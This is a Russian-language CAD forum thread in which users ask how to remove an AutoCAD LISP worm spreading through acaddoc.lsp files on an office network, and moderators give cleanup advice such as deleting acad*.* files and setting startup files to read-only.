Сообщений: 4,466
|
Цитата:
|
|||
![]() |
|
||||
Регистрация: 25.03.2008
Зелик
Сообщений: 1,602
|
Цитата:
А что там было, скажите название файла, а то я много чего оттуда качал (не всем -тьфу-тьфу- успел попользоваться). Надо и у себя удалить.
__________________
* Буква "ё" не используется в тексте исключительно в связи с требованиями ЕСКД. |
|||
![]() |
|
||||
Moderator
LISP, C# (ACAD 200[9,12,13,14]) Регистрация: 25.08.2003
С.-Петербург
Сообщений: 40,431
|
Если в архиве есть файл с маской имени acad*.* - то его уничтожай, остальное как правило уже безвредно.
__________________
Моя библиотека lisp-функций --- Обращение ко мне - на "ты". Все, что сказано - личное мнение. |
|||
![]() |
|
||||
Moderator
LISP, C# (ACAD 200[9,12,13,14]) Регистрация: 25.08.2003
С.-Петербург
Сообщений: 40,431
|
__________________
Моя библиотека lisp-функций --- Обращение ко мне - на "ты". Все, что сказано - личное мнение. |
|||
![]() |
|
||||
Други привет.
Каким-то образом попал к нам этот acaddoc.lsp У нас файлы в сети, человек 10 юзеров акада. стоят AutoCAD 2013, 2014, ASD 2013 Попробовал KillWorm142, кажись пользы нет, но может я его неверно использовал. Почитал тут тему, но не понял пока есть ли не безболезненное решение проблемы, особенно беспокоит вопрос сети, ведь в этом случае очистить свой комп и переставить акад не решение... Да и разгар работы, тут не до перестановки. Не пинайте плиз ФАК-ом а подскажите. 1. Как может навредить вирус кроме того что он везде себя копирует? 2. Какой способ избавления от него сейчас считается наиболее быстрым и эффективным (учитывая сеть)? Готовое решение есть? Вот этот гад... Код:
|
||||
![]() |
|
||||
Moderator
LISP, C# (ACAD 200[9,12,13,14]) Регистрация: 25.08.2003
С.-Петербург
Сообщений: 40,431
|
Первый пост темы.
__________________
Моя библиотека lisp-функций --- Обращение ко мне - на "ты". Все, что сказано - личное мнение. |
|||
![]() |
|
||||
Привет Алексей. Подскажи плиз, как понимаю мне достаточно последней (вот этой) строчки?
Цитата:
По первой код. Для чего именно он и что с ним делать? Запустить один раз функцию (inoe-erase-acad-virus) достаточно? Может следует в автозагрузку его? ----- добавлено через ~31 мин. ----- У меня AutoCAD 2013 + ASD 2013. Но дистрибутива нет под рукой чтоб взять не порченные нужные файлы. Могу поставить 2014. Вопрос. Если я снесу все 2013 и поставлю новый софт 2014, поможет ли если я сразу в нем acad*.lsp, acad*doc*.lsp, acad*.mnl сделаю read only? Естественно до этого найду и уничтожу все зараженные файлы (хоть те что у меня на машине а не в сети). Последний раз редактировалось Red Nova, 18.04.2015 в 14:19. |
||||
![]() |
|
||||
Цитата:
Но боюсь, что тогда ты начнёшь удивляться почему у тебя что-то нужное не грузится.
__________________
Сообщество программистов Autodesk в СНГ - техническая поддержка |
||||
![]() |
![]() |
|
Опции темы | Поиск в этой теме |
|
|
![]() |
||||
Тема | Автор | Раздел | Ответов | Последнее сообщение |
Резервуар 250м.куб. на проверку | dextron3 | Инженерные сети | 42 | 07.05.2011 15:59 |
Компьютер для автокада | ugoday | Компьютерная и бытовая техника, электроника и инструмент | 31 | 02.09.2007 15:07 |
Хочу купить монитор ЖК для автокада какой фирмы я не знаю вы | Рома_2 | Разное | 10 | 21.06.2007 03:44 |
Версия ЛАЙТ для автокада 2006 | Kaktuz | AutoCAD | 8 | 18.10.2006 18:39 |
Определение нагрузок для нестандартных конструкций. | NIVa | Конструкции зданий и сооружений | 2 | 06.08.2005 21:42 |